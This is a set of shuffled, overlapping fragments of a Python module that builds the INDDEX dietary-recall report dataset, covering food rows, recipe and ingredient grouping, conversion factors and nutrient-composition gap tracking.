"in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row)",
"and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type",
"definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See",
"and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM,",
"self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type",
"row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE:",
"Beneficiaries are asked about their diet in a \"recall\" session. This results in",
"master dataset for the INDDEX reports Overview -------- Beneficiaries are asked about their",
"ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient)",
"= self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not",
"entered as additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries",
"TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul, args) except",
"food, with metadata about the recall session, calculated nutritional information, and auditing columns",
"Standard recipes have their ingredients enumerated in the \"recipes\" lookup table. This dataset",
"not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures =",
"in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in",
"rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount',",
"IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant',",
"row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row in ingredients:",
"= recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients =",
"= fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid",
"return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator =",
"STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for",
"else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return",
"previously reported ingredients into the report for them. Components ---------- FoodData :: This",
"str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in",
"self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code,",
"case of their own. Nonstandard recipes are defined by the user and beneficiary",
"= IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in",
"import operator import uuid from collections import defaultdict from functools import reduce from",
"are missing some values, insert them from the master recipe nsr_cols = {col:",
"indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If",
"str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} })",
"# this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for",
"I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'),",
"# If it's an indicator that hasn't been explicitly set, check if it",
"case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [],",
"if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set, check",
"responsible for row-wise calculations and indicator definitions. \"\"\" import operator import uuid from",
"self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code =",
"self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists:",
"IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self,",
"for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions)",
"I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR,",
"This results in a \"foodrecall\" case. Every food they mention results in the",
"own. Nonstandard recipes are defined by the user and beneficiary during a recall",
"filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({",
"explicitly set, check if it can # be pulled from the food fixture",
"ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code,",
"indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator in the",
"@classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k:",
"yet been set. It will be \" \"calculated outside the scope of FoodRow.\")",
"recipes are defined by the user and beneficiary during a recall session. The",
"False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction",
"EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import (",
"if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code",
"found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META),",
"rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part",
"_multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row in",
"in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients]",
"self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used =",
"# don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return",
"I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY =",
"self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code')",
"I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8',",
"ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM",
"col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if",
"cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE",
"k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs",
"enumerated in the \"recipes\" lookup table. This dataset has additional rows inserted for",
"= _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self,",
"yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in",
"I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7',",
"self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif",
"if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group =",
"return None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly",
"= FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type ==",
"AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name):",
"IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2',",
"IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name',",
"return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if val",
"in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later",
"IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META),",
"linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe",
"I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc',",
"__getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not",
"by the user and beneficiary during a recall session. The ingredients of the",
"already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert duplicates of",
"I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'),",
"row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe,",
"row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = {",
"self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code",
"= FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v",
"self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe",
"self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions =",
"self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside",
"creation of a \"food\" case that's a child of this foodrecall. This dataset",
"and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if",
"for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file",
"This is the interface to this dataset, it glues together all the component",
"[ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row,",
"I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG",
"results in a \"foodrecall\" case. Every food they mention results in the creation",
"return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types",
"[FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name =",
"IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR),",
"__init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures",
"_non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\"",
"'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections):",
"None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary",
"row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type ==",
"IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR),",
"self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code",
"self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code'",
"user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data",
"= bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code",
"rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a",
"a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe =",
"set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has",
"I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food',",
"self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code",
"rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def",
"the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def",
"case. Every food they mention results in the creation of a \"food\" case",
"row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case",
"for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking'])",
"{ 'recipe': None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if",
"IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR),",
"group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if",
"fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists:",
"NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction =",
"self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name",
"_multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients):",
"I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id',",
"I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1',",
"= 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug =",
"IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META),",
"self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition",
"is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug:",
"IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR,",
"amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def",
"case subsequent references point to the recipe definition with already_reported_recipe_case_id and don't enumerate",
"True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type",
"CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'),",
"self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for",
"recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe,",
"from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta'",
"Overview -------- Beneficiaries are asked about their diet in a \"recall\" session. This",
"CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [",
"duplicates of the previously reported ingredients into the report for them. Components ----------",
"import defaultdict from functools import reduce from memoized import memoized from corehq.apps.es import",
"the food composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions",
"FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain,",
"def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount,",
"] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row =",
"I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'),",
"in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction']",
"It will be \" \"calculated outside the scope of FoodRow.\") return None if",
"= IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in",
"self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used",
"ingredients) @property @memoized def rows(self): rows = [] for row in self._get_all_rows(): if",
"< age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self,",
") from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META =",
"except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul, args)",
"INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow:",
"k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan,",
"\"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None,",
"reported ingredients into the report for them. Components ---------- FoodData :: This is",
"# nsr references are missing some values, insert them from the master recipe",
"FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or",
"False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types =",
"self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description =",
"yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for row",
"auditing columns reporting on what data is or isn't available. Some of these",
"food they mention results in the creation of a \"food\" case that's a",
"'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the recipe case",
"{ 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if",
"session. This results in a \"foodrecall\" case. Every food they mention results in",
"as a unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator",
"get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE,",
"self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property",
"# If a gap type is specified, show only rows with gaps of",
"I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE),",
"None return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None",
"Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR,",
".get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type",
"I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id',",
"I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR),",
"composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists =",
"ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self):",
"memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter",
"= uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient:",
"STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code,",
"= recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else:",
"FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE",
"import uuid from collections import defaultdict from functools import reduce from memoized import",
"if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self):",
"_calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor,",
"AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for",
"it's an indicator in the UCR that hasn't been explicitly set, return that",
"k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs)",
"FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures",
"them. Components ---------- FoodData :: This is the interface to this dataset, it",
"total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name =",
"self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False",
